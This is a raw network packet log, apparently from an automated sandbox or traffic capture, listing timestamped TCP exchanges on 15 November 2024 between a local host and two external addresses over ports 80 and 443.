Nov 15, 2024 18:14:08.905103922 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.905271053 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.905334949 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.909419060 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.909585953 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.909615040 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.909662008 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.909717083 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.909765959 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.023665905 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.023750067 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.023827076 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.023880005 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.023927927 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.023973942 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.023973942 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024019957 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024065018 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024090052 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024132967 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024158001 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024199009 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024296999 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024347067 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024364948 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024509907 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024564981 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024609089 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024632931 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.024681091 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.024912119 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025033951 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025089979 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025104046 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.025166035 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.025350094 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025407076 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025419950 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.025450945 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.025484085 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025549889 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.025903940 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.025995970 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.026052952 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.026067019 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.026144981 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.026302099 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.026357889 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.026371002 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.026407957 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.026437998 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.026484013 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.029109955 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.029171944 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.029236078 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.029279947 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.029334068 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.029376984 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143033981 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143115044 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143290043 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143356085 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143395901 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143436909 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143455029 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143522024 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143564939 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143582106 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143606901 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143640995 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143822908 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143872023 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143889904 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.143939018 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.143959045 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144006014 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144049883 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144077063 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144367933 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144445896 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144495010 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144520044 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144539118 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144577980 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144613028 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144758940 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144821882 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144835949 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144881010 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.144912958 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.144927979 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145215034 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.145262957 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145292044 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.145342112 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145360947 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.145426989 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145447969 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.145497084 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.145523071 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145538092 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145565033 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.145611048 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.145633936 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146013021 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.146043062 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146116972 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146167040 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.146183014 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146229982 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146279097 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.146297932 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146342039 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.146357059 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146403074 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.146447897 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.146469116 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147021055 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147073030 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147098064 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.147139072 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147186041 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.147205114 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147248983 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.147270918 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147346020 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147393942 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.147412062 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147911072 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147969961 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.147984028 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.148015976 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.148047924 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148097038 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148145914 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148159027 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.148204088 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148250103 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.148269892 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148314953 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.148753881 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148804903 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148849964 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.148945093 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.148994923 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.149044037 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.262634039 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.262727976 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.262778044 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.262824059 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.262872934 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.262919903 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.262964010 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.262964964 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263010979 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263042927 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263058901 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263093948 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263269901 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263344049 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263360977 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263555050 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263609886 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263624907 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263674021 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263690948 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263737917 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263791084 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263804913 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263844967 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.263890982 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.263910055 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264419079 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264475107 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264487982 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.264532089 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264575958 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.264597893 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264641047 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.264663935 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264715910 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264761925 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.264780045 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264830112 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.264874935 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.265248060 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265296936 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265346050 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.265362978 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265403986 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.265428066 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265470028 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265512943 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.265536070 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265583992 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.265600920 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.265644073 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.266094923 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.266145945 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.266164064 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.266204119 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.266230106 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.266269922 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.266295910 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.266338110 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.266360998 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.266417980 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:09.266434908 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:09.266474009 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:13.855628967 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:13.855720043 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:13.855803013 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:13.863115072 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:13.863157988 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:13.952511072 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:13.952573061 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:14.761531115 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.761632919 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:14.765919924 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:14.765933037 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.766345978 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.779572964 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:14.823327065 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.952089071 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.952141047 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.952246904 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:14.952269077 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.952605963 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.952675104 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:14.952687025 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:14.992713928 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.071904898 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.071926117 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.072025061 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.072046995 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.072819948 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.072890043 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.072900057 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.074464083 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.074549913 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.074554920 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.117738962 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.192378044 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.192389011 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.192538977 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.192538977 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.192564964 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.194746017 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.194787025 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.194828987 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.194859028 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.194902897 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.196794987 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.196871996 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.196878910 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.198349953 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.198426008 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.198436975 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.201004982 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.201529026 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.201581955 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.201601982 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.201628923 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.202081919 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.202163935 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.202174902 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.242744923 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.311644077 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.311806917 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.311836004 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.311871052 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.311887980 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.311942101 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.313209057 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.313293934 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.313308954 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.314001083 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.314074993 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.314095020 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.315973043 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.316076040 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.316090107 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.316135883 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.316200972 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.316214085 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.317495108 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.317572117 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.317584991 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.319493055 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.319581032 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.319611073 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.319652081 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.319708109 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.319725990 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.320430040 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.320525885 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.320544958 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.320657969 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.320822954 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.320837021 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.321336985 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.321410894 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.321423054 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.321543932 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.321616888 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.321629047 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.354312897 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.354490995 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.354501009 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.399008036 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435142994 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435180902 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435395002 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435420990 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435452938 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435487986 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435513020 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435527086 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435594082 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435657978 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435669899 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435703993 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435770035 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435781002 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435821056 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.435874939 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.435887098 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436140060 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436227083 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.436238050 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436271906 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436331034 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.436341047 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436513901 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436584949 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.436597109 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436794043 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436866999 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.436878920 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.436925888 CET	443	49705	142.215.209.78	192.168.2.5
